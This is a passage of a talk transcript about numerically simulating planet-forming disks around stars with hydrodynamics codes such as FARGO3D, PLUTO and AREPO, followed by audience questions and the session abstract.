fluid, and there are way too many single molecules to simulate them all, as we already said. So there are two ways to discretize it, so that we just look at smaller pieces. One is the Lagrangian description, just like taking small bubbles or balls of material that have a fixed mass. They have a certain velocity that varies between each particle, and they have, of course, a momentum, because they have a velocity and a mass. And we create a number of those particles and then just see how they move around and how they collide with each other. That would be one way. That was described last year in a very good talk; I can highly recommend listening to this talk if you're interested in this method. However, there's a second way to describe this: not just going with the flow of the particles, but we are a bit lazy, we just box it. So we create a grid. As you see down here, in this grid each box has a certain filling level and a bit of a slope, so what's the trend there? And then we just look, for each box, at what flows in and what flows out through the surfaces of this box. And then we have a volume or a mass filled within this box. And this is how we discretize what is going on in the disk. And actually, since we are usually in the system of a disk, we do not do it with nice boxes like this, but we use boxes like those, because they are already almost like a disk. And we just keep exactly the same boxes all the time and then just measure what goes through the surfaces of these boxes. So this is how these two methods look if you compute with both of them. One was done by me, I'm usually using this boxing method, and the other was done by my colleague. When you look at them, at the colors, at the structure, here you have the slope inward and you have the same slope inward here. You even have this little structure here, and the same here.
But what you notice is you have these enlarged dots; these are really the mass particles we saw before, these bubbles. And here you have this inner cutout. This is because when you create this grid, you have the very region at the inner part of the disk where the boxes become tinier and tinier, and we can't compute that, so we have to cut out the inner part at some point. So here, when you go to low densities, these bubbles blow up and distribute their mass over a larger area, so it's not very accurate for these areas. And here we have the problem that we can't calculate the inner area. So both methods have their pros and cons, and both are valid. But from now on, we will mostly focus on this one. So we have these nice stream features. So again, going back to the boxes, we have to measure the flow between the boxes. This flow, in physics, we call it flux. And we have a density, rho one, and a density, rho two. And the flux is the description of what mass moves through the surface here, from one box to the next. So if we write this in math terms, it looks like this. This says the time derivative of the density, meaning its change over time, just like the velocity is the change of position over time. And then this weird triangle symbol, it's called nabla, is a positional derivative. So it's like a slope: how much does a quantity change as we change our position? So the change of the density over time should correspond to the inflow and outflow over position. That is what this says. So then, in physics, we have a few principles that we always have to obey, because it's just almost common sense. One of them is, well, if we have mass in a box, like this, the mass should not go anywhere unless someone takes it out. So if we have a closed box and mass in that box, nothing should disappear magically, it should all stay in this box. So even if these particles jump around in our box with a certain velocity, it's the same number of particles in the end. That's again the same equation, just told in math. A second, very rudimentary principle is: if we have energy in a completely closed box, so, for example, these nice chemicals here, and we have a certain temperature. So in this case, our temperature is low, maybe outside around zero degrees Celsius, and then we have these nice chemicals down here. And at some point they react very heavily. We suddenly end up with much less chemical energy and a lot more thermal energy. But overall, the complete energy summed up here, the thermal and the chemical energy, also the kinetic energy and the potential energy, added up to this variable U, should not change over time if you sum up everything, because our energy is conserved within our closed box. And then the third thing is, I think you all know this: if you have a small mass with a certain velocity, a very high velocity in this case, and it bumps into something very large, what happens? Well, you get a very small velocity in this large body, and the smaller mass stops. And the principle here is that momentum is conserved, meaning that the mass times the velocity of one object is the same as, later, for the other one; since the other body is much larger, it only picks up a small velocity, but the product stays the same. That doesn't change. And in our simulations we also have to obey these rules, and we have to code them in so that we have physics in them. So you say, okay, this is really simple, these rules, right? But actually, well, it's not quite as simple.
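Written out in standard textbook form (this is generic fluid dynamics notation, not copied from the slides), the three conservation principles for the gas read:

```latex
% Mass, momentum and energy conservation for an ideal gas, textbook form.
\begin{align}
  \frac{\partial \rho}{\partial t} + \nabla \cdot (\rho \vec{v}) &= 0
    && \text{mass (continuity)} \\
  \frac{\partial (\rho \vec{v})}{\partial t}
    + \nabla \cdot (\rho \vec{v} \otimes \vec{v}) + \nabla p
    &= \rho \vec{g} && \text{momentum} \\
  \frac{\partial U}{\partial t} + \nabla \cdot \left[(U + p)\,\vec{v}\right] &= 0
    && \text{energy (no extra sources)}
\end{align}
```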
So this is the Navier-Stokes equation. It's a very complicated equation; it's not completely solved. And everything that is marked red here are again derivatives. Here we have our conservation law, that was the nice and simple part. But now we have to take other physical things into account: accounting for pressure, accounting for viscosity, for compression, so squeezing, and how sticky our fluid is, and also gravity. So we have a lot of additional factors, additional physics, that we also have to get in somehow. And all of these also depend somehow on the change of position or the change of time. And these derivatives aren't really nice for our computers, because they, well, they don't understand this triangle. So we need to find a way to write an algorithm so that it can somehow deal with this math formula in a way that a computer likes. One of the ways to do this, well, the simplest solution actually, is we just say, okay, we have now these nasty derivatives and we want to get rid of them. So if we look just at one box now, we say that the new value for the density in this box would be the previous density plus the flux in and out times the time step over which we measured this flux. And we have to somehow get to this flux, and we just say, okay, this flux now is, if we start here, the slope of this curve, the trend, so to say, where this curve is going right now, so it would look like this. So in our next time step, we would have a density down here, and, well, then we do this again. We again look at this point, where's the trend going, where's the line going? And then we end up here, same here. So again, we just try to find this flux, and this is the trend at this position in time. So this goes up here, and then if we are here now, look at this point, it should go up here. So this is what our next trend would be. And we do this over all the times, and this is how our simulation would calculate the density for one box over the different time steps. So that kind of works. The blue curve is the analytical one, the red curve is the simulated one. It works, but can we do better? It's not perfect yet, right? So what we can do is refine this a bit, taking a few more steps, making it a bit more computationally heavy, but trying to get a better resolution. So first we start with the same thing as before: we go to this point, find the trend at this point, like the line would go in this direction from this point, and then we go just half a step now. And now we look at this half step, at this point now, and do it again, the same thing, saying, okay, where's the trend going now, and then we take where this point would go and add it to this trend. So that would be the average of the trend at this exact point and this trend, this dark orange curve. And then we go back to the beginning with this trend now and say this is a better trend than the one we had before. We now use that and go again and search for the point after half a time step. And then again we do the same thing: we again find the trend and average it with the arrow from before. So it's not exactly the trend, it's a bit below the trend, because we averaged it with the arrow from before. And now we take this averaged trend from the beginning to the top, like this. Okay, this is already quite good, but we can still do a little bit better if we average it with our ending point. So we go here, look where the trend is going, that would go quite up, like this.
And we average this and this together, and then we end up with a line like this. This is so much better than what we had before. It's a bit more complicated, to be fair, but actually it's almost on the line. So this is what we wanted. So if we compare both of them, we have here our analytical curve: over time, in one box, this is how the density should increase. And now with both of the numerical methods, the difference looks like this. So with smaller and smaller time steps, even the Euler method gets closer and closer to the curve, but actually the Runge-Kutta, this four-step process, works much better and much faster, however each step is a bit more computationally difficult (both update rules are written out below). When we simulate objects in astronomy, we always want to compare them to objects that are really out there. So this is a giant telescope, well, consisting of a lot of small telescopes, but they can be connected and used as a giant telescope. And it takes photos of the dust in the sky, and this is used to take images of discs around stars, and these discs look like this. So these images were taken last year and they are really cool. Before we had those images, we only had images with less resolution, so they were just blurred blobs. And we could say, yeah, that might be a disc, but now we really see the discs. And we see rings here, thin rings, and we see thicker rings over here, and even some spirally structures here, and also some features that are not really radially symmetric, like this arc here. And it's not completely solved how these structures formed. To find that out, a colleague of mine took this little object with the asymmetry here. So this is the observed image, and this is his simulation. So this is how discs probably looked in the beginning, and he put in three planets and let the simulation run. And so what we see here is that the star is cut out. As Anna said, the grid cells in the inner part are very, very small and it would take a lot of time to compute them all, so that's why we are leaving out that spot in the middle. And what we see here is three planets interacting with the material in the disc. And we can see that these planets can make this thing here appear, so that in the end we have something looking very similar to what we want to have, or what we really observe. So we can say three planets could explain how these structures formed in this disc. It's a little bit elliptical, you see that. That's because it's tilted with respect to our line of sight. It would be round if we watched it face-on, but it's a little bit tilted. That's why it looks elliptical. So we already saw we can put planets in the gas and then we create structures. One very exciting thing that we found, it started in the last year or two years ago, but then we found more, is this system, PDS 70. In this system, for the very first time, we found a planet that was still embedded completely within the disc, so within the gas and dust. Usually, because the gas and dust is the main thing that creates a signal, some radiation because of heat, we only observe that and we can't observe the embedded planet; but in this case the planet was large enough and in the right position that we were actually able to observe some signature of accretion on this planet that was brighter than the rest of the disc. Then later, just this year, just a few months ago, we actually found out, well, this is not the only object here. This is very clearly a planet, but actually this spot here is also something. We can see it in different grains.
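For reference, the two update rules compared above, in their standard textbook forms for a single box with density evolution d\rho/dt = f(t, \rho) and time step \Delta t:

```latex
% Explicit Euler and the classical fourth-order Runge-Kutta scheme,
% standard textbook forms.
\begin{align}
  \text{Explicit Euler:}\quad
    \rho_{n+1} &= \rho_n + \Delta t \, f(t_n, \rho_n) \\[4pt]
  \text{Runge-Kutta (RK4):}\quad
    k_1 &= f(t_n, \rho_n) \\
    k_2 &= f\!\left(t_n + \tfrac{\Delta t}{2},\; \rho_n + \tfrac{\Delta t}{2} k_1\right) \\
    k_3 &= f\!\left(t_n + \tfrac{\Delta t}{2},\; \rho_n + \tfrac{\Delta t}{2} k_2\right) \\
    k_4 &= f\!\left(t_n + \Delta t,\; \rho_n + \Delta t\, k_3\right) \\
    \rho_{n+1} &= \rho_n + \tfrac{\Delta t}{6}\,(k_1 + 2k_2 + 2k_3 + k_4)
\end{align}
```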
Every picture here is a different set of grains observed. We can see this in four different, five different kinds of observations. So there is a planet here. And then there is also something, we don't know what it is yet, but it's point-like and it actually creates a feature that we can reproduce in different kinds of observational bands or different kinds of signals here. This is very interesting. For the first time, we actually see a planet forming right now within the disc. So a colleague of mine is also very interested in this system and started to simulate how two planets in a disc change the dynamics of the disc. So here we have this disc again; of course it is tilted, because it's not face-on, it's like 45 degrees tilted, not like this, but like this. So he had it face-on. This is what his simulation looks like. So there are two planets, these blobs here, in the simulation. Here we have a close-up. You can actually see that these little boxes are our simulation boxes, in which we have our densities. Then he just looked at how the planets would change the structure in the gas and also how the gas would interact with the planets, shifting them around. It's interesting: the planets tend to clear out an area, open a gap within the disc, block a lot of gas around here, so you have a brighter ring here again, and then they clear out more and more. At some point in the simulation, he saw they get a bit jumpy. So it's very nice. You also see that the planets induce some kind of features in the whole disc, like spiral features. So a single planet will change the symmetry and the appearance of a whole disc. The reason why the planet is staying at this point is because we're rotating with the planet. It's actually going around the disc, but the camera is rotating with the planet, so it's staying at the fixed place we put it in. But there's more. Because, as I already said with the Navier-Stokes equation, we have a lot of different kinds of physics that we all have to include in our simulations. One of the things, of course, is that we maybe don't have just a star in the disc. We have planets in there, and maybe two stars in there, and all of these larger bodies also have an interaction with each other. So if we have a star, every planet will have an interaction with the star, of course. But then the planets also have an interaction between each other, right? So in the end, you have to take into account all of these interactions. And then we also have accretion, looking like this. So accretion means that the gas is bound by some object. It can be the disc, the planet, or the star that takes up the mass, the dust, or the gas. And it's bound to this object. And then it's lost to the disc or the other structures, because it's completely bound to that. The principle of this would be a simulation I did last year and published. We have here a binary star. So these two dots are stars. I kind of kept them in the same spot, but every picture will be one orbit of this binary. But since we have interactions, you actually see them rotating because of the interactions with each other. And then we also have here a planet and here a planet. And the interesting thing was that these two planets interact in such a way that they end up on exactly the same orbit. So one starts further out, the orange one, and then very fast they go in and they end up on exactly the same orbit, if the video would now play nicely.
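The pairwise interactions between the star(s) and planets mentioned above amount to a direct N-body sum of gravitational accelerations. Here is a generic sketch of that sum, written in Go purely for concreteness; it is not the code used in the actual simulation codes.

```go
// Direct N-body summation of pairwise gravitational accelerations (generic
// illustration, SI units).
package main

import (
	"fmt"
	"math"
)

type Body struct {
	Mass     float64
	Pos, Vel [3]float64
}

const G = 6.674e-11 // gravitational constant

// accelerations returns the gravitational acceleration on every body caused
// by all the other bodies (star, planets, companion star, ...).
func accelerations(bodies []Body) [][3]float64 {
	acc := make([][3]float64, len(bodies))
	for i := range bodies {
		for j := range bodies {
			if i == j {
				continue
			}
			var d [3]float64
			r2 := 0.0
			for k := 0; k < 3; k++ {
				d[k] = bodies[j].Pos[k] - bodies[i].Pos[k]
				r2 += d[k] * d[k]
			}
			r := math.Sqrt(r2)
			f := G * bodies[j].Mass / (r2 * r) // GM / r^3
			for k := 0; k < 3; k++ {
				acc[i][k] += f * d[k]
			}
		}
	}
	return acc
}

func main() {
	sun := Body{Mass: 1.989e30}
	earth := Body{Mass: 5.972e24, Pos: [3]float64{1.496e11, 0, 0}}
	fmt.Println(accelerations([]Body{sun, earth}))
}
```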
So another thing: with the accretion here, we actually see clouds from above dropping down onto the newly forming star here. So all of this, what you see here, would be gas, hydrogen. And it's a very early phase, so this is not completely flat. It has a lot of material, and then you actually have this infall from above towards the star, and then the star keeps the mass. And we have to take this into account in our simulations as well. Another thing we have to take into account: up till now, we just cared about masses and densities. But of course, what we actually see is that stars are kind of warm, hopefully. Otherwise, temperatures here would also not be nice. And different chemicals have different condensation points. And that's also true in a system. So we start with the star temperature: at the surface of the star, we have a temperature around 4000 Kelvin. And then we go a bit into the disk, and there's a point where we, for the first time, have any solid material at all, because it starts to condense, and we actually have something solid like iron, for example, at 1500 Kelvin. And then, if we go further out, we reach a point where we have solid water. And this is at 200 Kelvin. This is what we need, actually, to have a planet that also has water on it, because if we don't get the water in the solid state, it will not fall onto a terrestrial planet and be bound there, right? So this is important for our Earth, actually. And then if we go even further out, we also have other gases condensing to solids, like CO2 or methane or things like that. And since we only get water on a planet when we have a temperature that is low enough so that the water actually forms a solid, it's important for us to think about where that is in our forming disk. Where do we start to have a planet like Earth that could have some water, right? But it's not just the simple picture where we have all these nice ring structures with a clear line, actually. It gets more complicated, because we have pressure and shocks, and thermodynamics is a lot like pogo dancing, right? You crash into each other and it's all about collisions. So the gas temperature is determined by the speed of your gas molecules, like here, bouncing and crashing into each other, exchanging momentum. So there are two ways to heat up such a dance. The first is that you get a large amount of velocity from the outside, like a huge kick, a shock into your system. And the second way would be if we have a higher pressure, like more molecules; then you of course have more collisions, and then a higher temperature. So if, because you now have a planet in the system, you change the pressure at some point, you actually get a higher temperature. And then we lose this nice line, because suddenly we have different pressures at different locations. And a colleague of mine also simulated this. So it starts off nice. This is the initial condition: we just assumed, okay, if we have no disturbance whatsoever, we have our ice line here at one AU, so the same distance as Earth to the Sun, and here, too. But here we assume that less heat gets transferred from the surface of the disk. And here we have a planet far out, like Jupiter or something. And now we actually let this planet change the structure of the disk, and what happens is that we find these spirals. And within these spirals, we change the pressure. And with this, actually, everywhere where you see this orange, it's hotter than the ice line.
So we don't have water where it's orange. And where it's blue, we can have water. And the interesting thing is even if we put a planet out here like Jupiter, we still form these regions in the inner system where we have less water. One problem in astrophysical simulations is that we don't always know how to shape our boxes or how small these boxes have to be. So we use a trick to reshape the boxes as we need them. It's called adaptive mesh. And this is a simulation of the red fluid flowing in this direction and the blue fluid in the other one. So at the boundary, the two fluids shear and they mix up somehow. And we don't know how in advance. So we start a simulation. And as the simulation starts, we reshape those boxes here. So in the middle, we don't need much reshape because it's not that complicated here. It's just a flow. But at the boundary, we see those mixing up of the two fluids. And so we reshape the cells as we need them. This is done in an astrophysical program called ARIPO. We will later show you some more programs to use for simulations. But another simulation I want to show you first is also done with ARIPO. And it's a simulation of the universe. So from here to here, it's very big. It's 30 million light years. So each of these dots you see here is the size of a galaxy or even more. And here you can actually see that at some regions, it's very empty. So we're rotating around this universe, this simulated universe here. And these regions here are empty and we don't need a lot of boxes there. Big boxes are enough here. But in this dense regions where we have a lot of material, we need smaller boxes. And this method I showed you where we reshape the boxes as we need them is used for this simulation. So actually you see, it's all the beginning of the universe there. Basically, the initial mass collapsing to the first galaxies and first supernovae starting, very beautiful simulation. So there are different programs as I already mentioned in astrophysics. Three of them, those three are all open source. So you can download them and use them on your own machine if you like. And but there are more, a lot more. And some of them open source, some of them are not. Sometimes it's hard to get them. In the following, we will present the two, Fargo 3D and Pluto in a detailed version or more detailed version than ARIPO. Because we usually use those two for our simulations. What I want to show you with this slide is that depending on what you want to simulate, you need to choose a different program. And one thing is that in astrophysics, we sometimes call the whole program code. So if I use the word code, sorry about that, I mean the whole program. So let's have a look at Fargo 3D. It's a hydrodynamics code and what you see here is an input parameter file. There you define how the disk looks like, how much mass does it have, how big is it, and what planet. So here, a Jupiter. Do you see that? A Jupiter is put in. And we also define how big our boxes are. This program is written in C, which is quite nice because a lot of astrophysical programs are still written in Fortran. So this is good for me because I don't know any Fortran. We can run this. And what's typical for Fargo, so that's a compilation. Actually on my computer, so I don't need a fancy computer. I just did it on my small laptop. And now we run it. Now typical for Fargo, as you will see, are a lot of dots. So here. It will print out a lot of dots. And it will create at certain times some outputs. 
And these outputs are huge files containing numbers. So if you look at them, they are not really interesting, they are just numbers in something like a text file. So a big part of astrophysics is also to visualize the data, not only to create it, but also to make images so that we can make movies out of them. For that, I prefer to use Python, but there are a lot of different tools to visualize the data. So this is actually that output, the first one we just saw: the Jupiter planet in the disk that I defined in this parameter file. And it has already started to make some spirals. And if I had let it run further, the spirals would be more prominent. And yeah, now we have a planet here on our computer. So, Pluto, on the other hand, has a few more setup files. What I need is three files here. It looks a bit complicated, so let's break it down. This file defines my grid, the initial values and the simulation time. Here we input what physics we actually want and need: what is our coordinate system, so do we want to have a disk, or just spherical boxes, or square boxes, and how is the time defined? And here we then actually write a bit of code to say, okay, how do I want the gravitational potential, so what's the source of gravity? Or what will happen at the inner region where we have this dark spot? We somehow have to define what happens if gas reaches this boundary: is it just falling in, is it bouncing back or something, or is it looping through from one end to the other? And this is also something we then just have to code in. And if we then make it and let it run, it looks like this. So again, the nice things we hopefully put in, or wanted to put in: the time steps, what our boundaries were, the parameters of the physics, hopefully the right ones. And then, nicely, we start with our time steps. And if we see this, it's hooray, it worked, because it's actually usually not that simple to set up a running problem; you have to really think about what the physics should be, what's the scale of your problem, what's the time scale of your problem, and specify this in a good way. But in principle, this is how it works. There are a few test problems that you can play around with to make it easy in the beginning. And this is how we do simulations. So as I already said, we can just start them on our laptop. So here, this is my laptop. I just type ./fargo3d, and it should run, right? And then I just wait for 10 years for it to finish the simulation of 500 time steps or something, like 500 outputs. Well, that's not the best idea. We need more power. And both of us, for example, are using a cluster from Baden-Württemberg, and that brings down our computation time by a lot, usually by a factor of maybe 20, which is a lot. So instead of maybe a year on my computer, I just need maybe five hours, a few days or a week on this cluster; a simulation usually takes about a week for me. So what you see here is that we use GPUs, yes, but we do not, or mostly do not, use them for gaming. We use them for actual science. Yeah, it would be nice to play on them, right? Yeah. That said, back to our Earth, actually. So can we now... well, we wanted to grow our own planet. Can we do that? Yes, of course. Can we grow Earth? Well, Earth is a very special planet. We have a very nice temperature here, right? And we do not have a crushing atmosphere like Jupiter, a huge planet that we could not live under.
So back to our Earth, actually. We wanted to grow our own planet; can we do that? Yes, of course. But can we grow Earth? Well, Earth is a very special planet. We have a very nice temperature here, right? And we don't have a crushing atmosphere like Jupiter, a huge planet that we could not live under. We have a magnetic field that shields us from the radiation from space, and we have water, but just enough water so that we still have land on this planet that we can live on. So even if we fine-tune our simulations, the probability that we actually hit Earth and get all the parameters right is actually tiny. It's not that easy to simulate an Earth. And there are a lot of open questions, too. How did we actually manage to get just this sip of water on our surface? How did we manage to collide, or aggregate, enough mass to form the terrestrial planets without Jupiter sweeping up all the mass in our system? How could we be stable in this orbit when there are seven other planets swirling around and interacting with us? All of this is actually still open in our field of research, and not completely understood. This is the reason why we still need to do astrophysics. And even in all our simulations there is no planet B, and the Earth is quite unique and perfect for human life. So please take care of the Earth, and take care of yourself and of all the other people at the Congress. And thank you for listening. And thank you to everyone who helped us make this possible and to the people who actually coded the programs with which we simulate. Thank you. Thank you for the beautiful talk and for the message at the end. The floor is open for discussion, so if you guys have any questions, please come to the microphones. I'm asking my Signal Angel: no questions right now, but microphone two, please. Yes, thank you very much, very beautiful talk, I can agree. I have two questions. The first is: you showed you are using the Navier-Stokes equations, but on the one hand you have the dust disk, and on the other hand you have solid planets in it. So are you using the same description for both, or is it a hybrid? It very much depends. This is one of the things I showed you: for Pluto we write this C file that specifies some things, and about every physicist has somewhat his or her own version of things. So usually the planets, if they are large, will be put in as a gravity source, and possibly one that can accrete. And pebbles are usually put in a different way. However, pebbles are also a bit complicated at the moment. There are special groups specializing in understanding pebbles, because as we said in the beginning, when they collide they should usually be destroyed. If you hit two rocks together they don't stick; if you hit them hard together they splatter apart and we don't end up with bigger objects. So to explain: pebbles are small rocks or big grains of sand or something like that, so bigger rocks, but not very big yet. It depends on which code you use. Very short, maybe, one more: do you also need to include relativistic effects, or is that completely out? That's a good question. Mostly, if you have a solar-type system, you're in a range where this is not necessary. For example, with the binaries, if they get very close together, then at the inner part of the disk that is something we could consider. And actually I know that Pluto has modules to include relativistic physics too. Yes. Thank you. Okay, we have quite some questions, so keep them short. Number one, please. Thank you. Yeah, thank you very much for your interesting talk. I think you had it on your very first slide that about 70% of the universe consists of dark matter and dark energy. Is that somehow considered in your simulations, or how do you handle this?
Well, in the simulations we make, planets and disks around stars, it's not considered there. In the simulation we showed you about the universe, the blueish things at the beginning were all dark matter, so that was included in there. Okay, thank you. Okay, microphone three. Hi, thanks. Sorry, I think you talked about three different programs, Pluto, FARGO3D and a third one. Assuming, say, you're a complete beginner, which program would you suggest, like, if you want to learn, which one is more user friendly or good to start with? I would suggest FARGO first. It's kind of user friendly, has somewhat good support, and they are also always very thankful for comments and additions if people are actually engaged in trying to improve on it. Because we are physicists, we're not perfect programmers, and we're also happy to learn more. So yeah, FARGO I would suggest; it has some easy ways of testing some systems and getting something done. And it also has very good documentation, and a manual on the Internet for how to make the first steps, so you can look that up. Awesome, thank you. Let's get one question from outside, from my Signal Angel. Thank you for your talk. There's one question from the IRC: how do you know your model is good when you can only observe snapshots? Oh, that's a good question. As we said, we're in theoretical astrophysics, so there are theoretical models, and these models cannot include everything; every single process is not possible, because then we would calculate for years. To know if a model is good, you have to... Usually you have a hypothesis or an observation that you somehow want to understand, with most of the necessary physics included at that stage to reproduce this image. Also from the observation we have to take into account what our parameters should be, how dense the end of the simulation should be, and things like this. So comparing to observations is the best measure we can get of whether we kind of agree. Of course, if we do something completely wrong, then it will just blow up, or we will get a horribly high density. So this is how we know: the physics will just go crazy if we make too large mistakes. Otherwise, we try to compare to observations to check that what we did is actually sensible. That's one of the most complicated tasks: to include just enough physics that the system is represented in a good enough way, but not so much that our simulation would blow up in time. Number two, please. I've got a question about the adaptive grids. How does the computer decide how to adapt the grid, given that the data showing where the high density is only comes after making the grid? Yes. This is actually quite interesting, and also not an easy question to answer. Let me try to give a nutshell answer here. The thing is, you measure and evaluate the velocities; in the flux you also evaluate the velocity. And if the velocity gets high, you know there's a lot happening, so we need a smaller grid there. So we try to create more grid cells where we have a higher velocity. That's it in a nutshell. This is, of course, a bit harder to actually achieve in an algorithm, but this is the idea. We measure the velocities at each point, and then if we measure a high velocity, we change to a smaller grid. So you can predict where the mass will go and where the densities are getting high. Exactly, step by step. Okay, so to say. Thanks.
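To make that last answer a bit more concrete, here is a toy sketch of the idea just described: look at the velocity in each cell and flag cells for smaller boxes where the velocity jumps strongly to a neighbouring cell. Real codes such as AREPO use far more sophisticated refinement machinery; the one-dimensional setup and the threshold below are assumptions purely for illustration.

```python
import numpy as np

# Toy 1D grid of cells with a velocity value in each cell. In a real run this
# would come from the hydrodynamics solver at the current time step.
velocity = np.array([0.1, 0.1, 0.2, 1.5, 2.3, 2.1, 0.3, 0.1])

# How strongly does the velocity jump between neighbouring cells?
jump = np.abs(np.diff(velocity))

# Flag a cell for refinement if the jump on either of its sides exceeds a
# (completely arbitrary, illustrative) threshold.
threshold = 0.5
refine = np.zeros_like(velocity, dtype=bool)
refine[:-1] |= jump > threshold   # jump towards the right neighbour
refine[1:] |= jump > threshold    # jump towards the left neighbour

for i, (v, r) in enumerate(zip(velocity, refine)):
    print(f"cell {i}: velocity={v:4.1f} -> "
          f"{'refine (smaller boxes)' if r else 'keep coarse'}")
```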
We stay with microphone two. Okay, I've got a bit of a classic question. So I guess a lot relies on your initial conditions, and I have two questions related to that. First, I guess they are inspired by observations; what are the uncertainties that you have in them? And what is the impact if you change your initial conditions, like the density in the disk? Yeah. Right now, my main research is actually figuring out sensible initial conditions, or parameters, for a disk. If you have an initial set of conditions and a sensible set of parameters and let it run very long, you expect the system to hopefully converge to the state that it should be in. But your parameters are, of course, very important. Here we go back to what we can actually understand from observations. What we need, for example, is the density, and that is something we try to estimate from the light we see in these disks, the ones you saw in that nice grid with all the disks. We estimate, okay, what's the average light there, and what should then be the average densities of dust and gas in comparable disks? Okay. Thanks. Okay, one more at number two. Yes, thank you for the talk. When you increase the detail on the grid in the Euler model, and you want to compute the gravitational force in one cell, you have to sum over all the masses from all the other cells. So the complexity of the calculation grows quite radically, with the square of the number of cells. How do you solve that? Yes, that's it. Or do you just put in more CPUs? Well, that would be one way to do it. But there are ways to simplify if you have a lot of particles in one direction and they are far away from the object you're looking at. So if you have several balls here and one ball there, then you can include all these balls individually, or you can think of them as one ball. How you decide how many particles you can take together is by looking at the angle that these many particles subtend, seen from the object you're looking at. You can define a critical angle, and if an object, or a group of objects, gets smaller than this angle, you can just say, okay, that's one object. So that's a way to simplify this method. I think that's the main idea. Okay, we have another one. Do you have a strategy to check if the simulation will give a valuable solution, or does it happen a lot that you wait one week for the calculation and find out, okay, it's total trash, or it crashed in the meantime? So that also depends on the program you're using. In FARGO, it gives these outputs after a certain number of calculation steps, and you can already look at those outputs before the simulation is finished. So that would be a way to check whether it's really working. And I think it's the same for Pluto. There's a difference between time steps and output steps, and you define your output steps not as the whole simulation; you can look at each output step as soon as it's produced. So I usually get like 500 outputs, but I can already look at the first and second after maybe half an hour or something like that. Yeah, but it also happens that you start a simulation and wait and wait and wait and then see that you put something wrong in there, and well, then you have to do it again. So this happens as well. Thanks.
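Stepping back to the answer above about the cost of computing gravity: grouping far-away particles by the angle they subtend is the opening-angle trick used by tree codes, often called the Barnes-Hut criterion. Here is a simplified sketch of that idea in isolation. The critical angle of 0.5 and the single-level grouping are assumptions for illustration; real tree codes apply the criterion recursively on a hierarchy of nodes.

```python
import numpy as np

def far_enough(group_size, distance, theta_crit=0.5):
    """Opening criterion: if the angle the group subtends (roughly size over
    distance) is below the critical angle, the whole group may be replaced
    by a single point mass at its centre of mass."""
    return group_size / distance < theta_crit

def approx_acceleration(target, positions, masses, group_size, G=1.0):
    """Acceleration on `target` from a clump of particles, either summed
    particle by particle or collapsed to the clump's centre of mass."""
    com = np.average(positions, axis=0, weights=masses)   # centre of mass
    if far_enough(group_size, np.linalg.norm(com - target)):
        # Treat the whole clump as one body: a single force evaluation.
        r = com - target
        return G * masses.sum() * r / np.linalg.norm(r) ** 3
    # Otherwise sum over every particle individually (the expensive path).
    acc = np.zeros(3)
    for pos, m in zip(positions, masses):
        r = pos - target
        acc += G * m * r / np.linalg.norm(r) ** 3
    return acc

# Tiny example: a small clump of three particles far away from the target.
positions = np.array([[10.0, 0.2, 0.0], [10.3, -0.1, 0.1], [9.8, 0.0, -0.2]])
masses = np.array([1.0, 2.0, 1.5])
print(approx_acceleration(np.zeros(3), positions, masses, group_size=0.5))
```

The point of the trick is that each force evaluation then costs roughly log N instead of N per particle, which is what keeps the overall cost from growing with the square of the number of cells or particles.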
Okay, one final question. Yeah, okay. Is there a program in which you can calculate backwards, so that you don't have the starting conditions but the ending conditions, and you can calculate how it had started? Not for hydrodynamics. If you go to N-body, there is a way to go backwards in time. But for hydrodynamics, the thing is that you have turbulent, almost chaotic conditions, so you cannot really turn them back in time. With N-body it's kind of, well, it's not analytically solved either, but it's much closer than the turbulence, streams, spirals and all the things you saw in the simulations. Okay, I guess that brings us to the end of the talk and of the session. Thank you for the discussion and, of course, thank you guys for the presentation.
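As a small footnote to that last answer: one reason an N-body calculation can be run backwards is that the standard leapfrog (kick-drift-kick) integrator is time-reversible. Integrate forward, then integrate again with a negative time step, and you march back to the initial state up to round-off error. The two-body setup, step size and units below are arbitrary choices purely for illustration.

```python
import numpy as np

def accelerations(pos, masses, G=1.0, eps=1e-12):
    """Pairwise gravitational accelerations for a handful of bodies."""
    acc = np.zeros_like(pos)
    for i in range(len(pos)):
        for j in range(len(pos)):
            if i != j:
                r = pos[j] - pos[i]
                acc[i] += G * masses[j] * r / (np.linalg.norm(r) ** 3 + eps)
    return acc

def leapfrog(pos, vel, masses, dt, steps):
    """Kick-drift-kick leapfrog; time-reversible, so a negative dt undoes it."""
    pos, vel = pos.copy(), vel.copy()
    for _ in range(steps):
        vel += 0.5 * dt * accelerations(pos, masses)
        pos += dt * vel
        vel += 0.5 * dt * accelerations(pos, masses)
    return pos, vel

# Two bodies on a rough mutual orbit (arbitrary illustrative values).
masses = np.array([1.0, 0.001])
pos0 = np.array([[0.0, 0.0], [1.0, 0.0]])
vel0 = np.array([[0.0, 0.0], [0.0, 1.0]])

pos1, vel1 = leapfrog(pos0, vel0, masses, dt=0.001, steps=5000)   # forward
pos2, vel2 = leapfrog(pos1, vel1, masses, dt=-0.001, steps=5000)  # and back

print("maximum position error after going there and back:",
      np.max(np.abs(pos2 - pos0)))
```

Turbulent gas flows offer no such luck: small errors get amplified so quickly that the backwards problem is effectively ill-posed, which is the point the speakers make.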
This year the Nobel prize in physics was awarded to three astronomers changing the understanding of the Universe and finding the first exoplanet. This is a good reason to dive into astronomy, numerics, and programming and to learn how modern astronomy creates the pictures and models of the reality we observe in the night sky. Let’s find out together how we can simulate the Universe and grow new planets – computationally! In all ages people have gazed at the stars and tried to grasp the dimensions of the Universe and of the teeny-tiny marble we call our planet and wondered how unique it actually is. From the ancient Greeks to Johannes Kepler to modern times we slowly advanced our understanding of the sky and the laws necessary to describe the orbits and evolution of all its objects. Nowadays computational power has greatly increased. So we can further our understanding of the Universe from basic, analytically computable orbits to the challenge of turbulent gas flows – only accessible with numerical simulations. Let's go on a journey through space and compare the data we observe with breath-taking accuracy using instruments like ALMA, VLT, Gaia, and the Hubble Space Telescope to numerical simulations now possible due to computer clusters, multi-core CPU and GPU calculations. We want to explore the physics and numeric algorithms we need to comprehend the Universe and travel to the unexplored territory of problems we cannot quite solve yet. We present three state-of-the-art hydrodynamics programs: PLUTO (by A. Mignone), FARGO3D (by P. Benítez Llambay and F. Masset) and AREPO (by V. Springel). All of them are free open source software and commonly used in research worldwide. Using their example, we demonstrate how hydrodynamics recreates many of the things we see in the sky, including planets. Simulations teach us how rare the formation of Earth was and show that there is no alternative planet in reach. In modern times we humans continue to gaze at the stars. Even without Planet B in sight, we are still fascinated with what we see. Numerical methods help us satisfy our thirst for knowledge and accelerate the research of the Universe.
10.5446/53202 (DOI)
